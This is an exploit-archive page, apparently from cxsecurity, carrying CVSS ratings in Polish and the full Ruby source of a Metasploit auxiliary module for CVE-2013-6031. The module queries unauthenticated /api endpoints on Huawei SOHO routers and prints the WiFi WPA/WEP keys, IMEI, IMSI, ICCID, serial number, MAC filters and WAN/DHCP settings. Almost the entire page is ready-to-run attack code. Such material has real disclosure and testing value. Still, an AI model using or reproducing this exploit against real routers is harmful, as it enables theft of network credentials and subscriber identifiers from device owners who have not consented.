Huawei Datacard CSRF Information Disclosure Vulnerability Exploit

2014.03.12
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-287


Ogólna skala CVSS: 4.3/10
Znaczenie: 4.9/10
Łatwość wykorzystania: 5.5/10
Wymagany dostęp: Sieć lokalna
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Brak

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'base64' require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Huawei Datacard, CSRF Information Disclosure Vulnerability", 'Description' => %q{ This module exploits an un-authenticated information disclosure vulnerability in Huawei SOHO routers. It will gather information by accessing the /api pages where authentication is not required, thus allowing configuration changes as well as information disclosure including any stored SMS. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jimson K James.', 'tomsmaily [at] aczire.com', #Msf module ], 'References' => [ [ 'CVE', '2013-6031' ], # [ 'OSVDB', '6031' ], # [ 'BID', '6031' ], # [ 'URL', 'http://seclists.org/bugtraq/2013/Nov/6031' ], ], 'DisclosureDate' => "Nov 11 2013" )) register_options( [ OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin']), OptBool.new('GAP', [false, 'Attempt admin password reset using wifi password.', false]), ], self.class) end def run #Gather basic router information get_router_info print_status("") get_router_mac_filter_info print_status("") get_router_wan_info print_status("") get_router_dhcp_info print_status("") print_status("Now trying to get WiFi Key details...") res = send_request_raw( { 'method' => 'GET', 'uri' => '/api/wlan/security-settings', }, 25) #check whether we got any response from server and proceed. if not res print_error("Failed to get any response from server!!!") return end #Is it a HTTP OK if (!(res.code == 200)) print_error("Did not get HTTP 200, URL was not found. Exiting!") return end #Check to verify server reported is a Huawei router if (!(res.headers['Server'].match(/IPWEBS\/1.4.0/i))) print_error("Target doesn't seem to be a Huawei router. Exiting!") return end print_status("---===[ WiFi Key Details ]===---") wifissid = get_router_ssid if wifissid print_status("WiFi SSID: #{wifissid}") end # Grabbing the wifiwpapsk if res.body.match(/<WifiWpapsk>(.*)<\/WifiWpapsk>/i) wifiwpapsk = $1 print_status("Wifi WPA PSK: #{wifiwpapsk}") end # Grabbing the WifiAuthmode if res.body.match(/<WifiAuthmode>(.*)<\/WifiAuthmode>/i) wifiauthmode = $1 print_status("Wifi Auth mode: #{wifiauthmode}") end # Grabbing the WifiBasicencryptionmodes if res.body.match(/<WifiBasicencryptionmodes>(.*)<\/WifiBasicencryptionmodes>/i) wifibasicencryptionmodes = $1 print_status("Wifi Basic encryption modes: #{wifibasicencryptionmodes}") end # Grabbing the WifiWpaencryptionmodes if res.body.match(/<WifiWpaencryptionmodes>(.*)<\/WifiWpaencryptionmodes>/i) wifiwpaencryptionmodes = $1 print_status("Wifi WPA Encryption Modes: #{wifiwpaencryptionmodes}") end # Grabbing the WifiWepKey1 if res.body.match(/<WifiWepKey1>(.*)<\/WifiWepKey1>/i) wifiWepKey1 = $1 print_status("Wifi WEP Key1: #{wifiWepKey1}") end # Grabbing the WifiWepKey2 if res.body.match(/<WifiWepKey2>(.*)<\/WifiWepKey2>/i) wifiWepKey2 = $1 print_status("Wifi WEP Key2: #{wifiWepKey2}") end # Grabbing the WifiWepKey3 if res.body.match(/<WifiWepKey3>(.*)<\/WifiWepKey3>/i) wifiWepKey3 = $1 print_status("Wifi WEP Key3: #{wifiWepKey3}") end # Grabbing the WifiWepKey4 if res.body.match(/<WifiWepKey4>(.*)<\/WifiWepKey4>/i) wifiWepKey4 = $1 print_status("Wifi WEP Key4: #{wifiWepKey4}") end # Grabbing the WifiWepKeyIndex if res.body.match(/<WifiWepKeyIndex>(.*)<\/WifiWepKeyIndex>/i) wifiWepKeyIndex = $1 print_status("Wifi WEP Key Index: #{wifiWepKeyIndex}") end rescue::Exception => e print_status("Ooooops: #{e.class} #{e}") #end run end def get_router_info print_status("Attempting to connect to #{rhost} to gather basic device information...") res = send_request_raw( { 'method' => 'GET', 'uri' => '/api/device/information', }, 25) #check whether we got any response from server and proceed. if not res print_error("Failed to get any response from server!!!") return end #Is it a HTTP OK if (res.code == 200) print_status("Okay, Got an HTTP 200 (okay) code. Verifying Server header") else print_error("Did not get HTTP 200, URL was not found. Exiting!") return end #Check to verify server reported is a Huawei router if (res.headers['Server'].match(/IPWEBS\/1.4.0/i)) print_status("Server is a Huawei router! Grabbing info\n") else print_error("Target doesn't seem to be a Huawei router. Exiting!") return end print_status("---===[ Basic Information ]===---") # Grabbing the DeviceName if res.body.match(/<DeviceName>(.*)<\/DeviceName>/i) deviceName = $1 print_status("Device Name: #{deviceName}") end # Grabbing the SerialNumber if res.body.match(/<SerialNumber>(.*)<\/SerialNumber>/i) serialNumber = $1 print_status("Serial Number: #{serialNumber}") end # Grabbing the IMEI if res.body.match(/<Imei>(.*)<\/Imei>/i) imei = $1 print_status("IMEI: #{imei}") end # Grabbing the IMSI if res.body.match(/<Imsi>(.*)<\/Imsi>/i) imsi = $1 print_status("IMSI: #{imsi}") end # Grabbing the ICCID if res.body.match(/<Iccid>(.*)<\/Iccid>/i) iccid = $1 print_status("ICCID: #{imsi}") end # Grabbing the HardwareVersion if res.body.match(/<HardwareVersion>(.*)<\/HardwareVersion>/i) hardwareVersion = $1 print_status("Hardware Version: #{hardwareVersion}") end # Grabbing the SoftwareVersion if res.body.match(/<SoftwareVersion>(.*)<\/SoftwareVersion>/i) softwareVersion = $1 print_status("Software Version: #{softwareVersion}") end # Grabbing the WebUIVersion if res.body.match(/<WebUIVersion>(.*)<\/WebUIVersion>/i) webUIVersion = $1 print_status("WebUI Version: #{webUIVersion}") end # Grabbing the MacAddress1 if res.body.match(/<MacAddress1>(.*)<\/MacAddress1>/i) macAddress1 = $1 print_status("Mac Address1: #{macAddress1}") end # Grabbing the MacAddress2 if res.body.match(/<MacAddress2>(.*)<\/MacAddress2>/i) macAddress2 = $1 print_status("Mac Address2: #{macAddress2}") end # Grabbing the ProductFamily if res.body.match(/<ProductFamily>(.*)<\/ProductFamily>/i) productFamily = $1 print_status("Product Family: #{productFamily}") end # Grabbing the Classification if res.body.match(/<Classify>(.*)<\/Classify>/i) classify = $1 print_status("Classification: #{classify}") end end def get_router_ssid #print_status("Attempting to connect to http://#{rhost}/api/device/information to get router ssid") res = send_request_raw( { 'method' => 'GET', 'uri' => '/api/wlan/basic-settings', }, 25) #check whether we got any response from server and proceed. if not res print_error("Failed to get any response from server!!!") return end #Is it a HTTP OK if (!(res.code == 200)) print_error("Did not get HTTP 200, URL was not found. Exiting!") return end #Check to verify server reported is a Huawei router if (!(res.headers['Server'].match(/IPWEBS\/1.4.0/i))) print_error("Target doesn't seem to be a Huawei router. Exiting!") return end # Grabbing the Wifi SSID if res.body.match(/<WifiSsid>(.*)<\/WifiSsid>/i) ssid = $1 #print_status("SSID #{ssid}") return $1 end end def get_router_mac_filter_info res = send_request_raw( { 'method' => 'GET', 'uri' => '/api/wlan/mac-filter', }, 25) #check whether we got any response from server and proceed. if not res print_error("Failed to get any response from server!!!") return end #Is it a HTTP OK if (!(res.code == 200)) print_error("Did not get HTTP 200, URL was not found. Exiting!") return end #Check to verify server reported is a Huawei router if (!(res.headers['Server'].match(/IPWEBS\/1.4.0/i))) print_error("Target doesn't seem to be a Huawei router. Exiting!") return end print_status("---===[ MAC Filter Information ]===---") # Grabbing the WifiMacFilterStatus if res.body.match(/<WifiMacFilterStatus>(.*)<\/WifiMacFilterStatus>/i) wifiMacFilterStatus = $1 print_status("Wifi MAC Filter Status: #{(wifiMacFilterStatus == "1") ? "ENABLED" : "DISABLED"}" ) end # Grabbing the WifiMacFilterMac0 if res.body.match(/<WifiMacFilterMac0>(.*)<\/WifiMacFilterMac0>/i) wifiMacFilterMac = $1 if !(wifiMacFilterMac == "") print_status("Mac: #{wifiMacFilterMac}") end end # Grabbing the WifiMacFilterMac1 if res.body.match(/<WifiMacFilterMac1>(.*)<\/WifiMacFilterMac1>/i) wifiMacFilterMac = $1 if !(wifiMacFilterMac == "") print_status("Mac: #{wifiMacFilterMac}") end end # Grabbing the WifiMacFilterMac2 if res.body.match(/<WifiMacFilterMac2>(.*)<\/WifiMacFilterMac2>/i) wifiMacFilterMac = $1 if !(wifiMacFilterMac == "") print_status("Mac: #{wifiMacFilterMac}") end end # Grabbing the WifiMacFilterMac3 if res.body.match(/<WifiMacFilterMac3>(.*)<\/WifiMacFilterMac3>/i) wifiMacFilterMac = $1 if !(wifiMacFilterMac == "") print_status("Mac: #{wifiMacFilterMac}") end end # Grabbing the WifiMacFilterMac4 if res.body.match(/<WifiMacFilterMac4>(.*)<\/WifiMacFilterMac4>/i) wifiMacFilterMac = $1 if !(wifiMacFilterMac == "") print_status("Mac: #{wifiMacFilterMac}") end end # Grabbing the WifiMacFilterMac5 if res.body.match(/<WifiMacFilterMac5>(.*)<\/WifiMacFilterMac5>/i) wifiMacFilterMac = $1 if !(wifiMacFilterMac == "") print_status("Mac: #{wifiMacFilterMac}") end end # Grabbing the WifiMacFilterMac6 if res.body.match(/<WifiMacFilterMac6>(.*)<\/WifiMacFilterMac6>/i) wifiMacFilterMac = $1 if !(wifiMacFilterMac == "") print_status("Mac: #{wifiMacFilterMac}") end end # Grabbing the WifiMacFilterMac7 if res.body.match(/<WifiMacFilterMac7>(.*)<\/WifiMacFilterMac7>/i) wifiMacFilterMac = $1 if !(wifiMacFilterMac == "") print_status("Mac: #{wifiMacFilterMac}") end end # Grabbing the WifiMacFilterMac8 if res.body.match(/<WifiMacFilterMac8>(.*)<\/WifiMacFilterMac8>/i) wifiMacFilterMac = $1 if !(wifiMacFilterMac == "") print_status("Mac: #{wifiMacFilterMac}") end end # Grabbing the WifiMacFilterMac9 if res.body.match(/<WifiMacFilterMac9>(.*)<\/WifiMacFilterMac9>/i) wifiMacFilterMac = $1 if !(wifiMacFilterMac == "") print_status("Mac: #{wifiMacFilterMac}") end end end def get_router_wan_info res = send_request_raw( { 'method' => 'GET', 'uri' => '/api/monitoring/status', }, 25) #check whether we got any response from server and proceed. if not res print_error("Failed to get any response from server!!!") return end #Is it a HTTP OK if (!(res.code == 200)) print_error("Did not get HTTP 200, URL was not found. Exiting!") return end #Check to verify server reported is a Huawei router if (!(res.headers['Server'].match(/IPWEBS\/1.4.0/i))) print_error("Target doesn't seem to be a Huawei router. Exiting!") return end print_status("---===[ WAN Details ]===---") # Grabbing the WanIPAddress if res.body.match(/<WanIPAddress>(.*)<\/WanIPAddress>/i) wanIPAddress = $1 print_status("Wan IP Address: #{wanIPAddress}") end # Grabbing the PrimaryDns if res.body.match(/<PrimaryDns>(.*)<\/PrimaryDns>/i) primaryDns = $1 print_status("Primary Dns: #{primaryDns}") end # Grabbing the SecondaryDns if res.body.match(/<SecondaryDns>(.*)<\/SecondaryDns>/i) secondaryDns = $1 print_status("Secondary Dns: #{secondaryDns}") end end def get_router_dhcp_info res = send_request_raw( { 'method' => 'GET', 'uri' => '/api/dhcp/settings', }, 25) #check whether we got any response from server and proceed. if not res print_error("Failed to get any response from server!!!") return end #Is it a HTTP OK if (!(res.code == 200)) print_error("Did not get HTTP 200, URL was not found. Exiting!") return end #Check to verify server reported is a Huawei router if (!(res.headers['Server'].match(/IPWEBS\/1.4.0/i))) print_error("Target doesn't seem to be a Huawei router. Exiting!") return end print_status("---===[ DHCP Details ]===---") # Grabbing the DhcpIPAddress if res.body.match(/<DhcpIPAddress>(.*)<\/DhcpIPAddress>/i) dhcpIPAddress = $1 print_status("LAN IP Address: #{dhcpIPAddress}") end # Grabbing the DhcpStatus if res.body.match(/<DhcpStatus>(.*)<\/DhcpStatus>/i) dhcpStatus = $1 print_status("DHCP: #{(dhcpStatus=="1") ? "ENABLED" : "DISABLED"}") end if (dhcpStatus != "1") return end # Grabbing the DhcpStartIPAddress if res.body.match(/<DhcpStartIPAddress>(.*)<\/DhcpStartIPAddress>/i) dhcpStartIPAddress = $1 print_status("DHCP StartIPAddress: #{dhcpStartIPAddress}") end # Grabbing the DhcpEndIPAddress if res.body.match(/<DhcpEndIPAddress>(.*)<\/DhcpEndIPAddress>/i) dhcpEndIPAddress = $1 print_status("DHCP EndIPAddress: #{dhcpEndIPAddress}") end # Grabbing the DhcpLeaseTime if res.body.match(/<DhcpLeaseTime>(.*)<\/DhcpLeaseTime>/i) dhcpLeaseTime = $1 print_status("DHCP Lease Time: #{dhcpLeaseTime}") end end #end module end

Referencje:

http://www.kb.cert.org/vuls/id/341526
https://github.com/aczire/huawei-csrf-info_disclosure/blob/master/huawei_wifi_info.rb


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top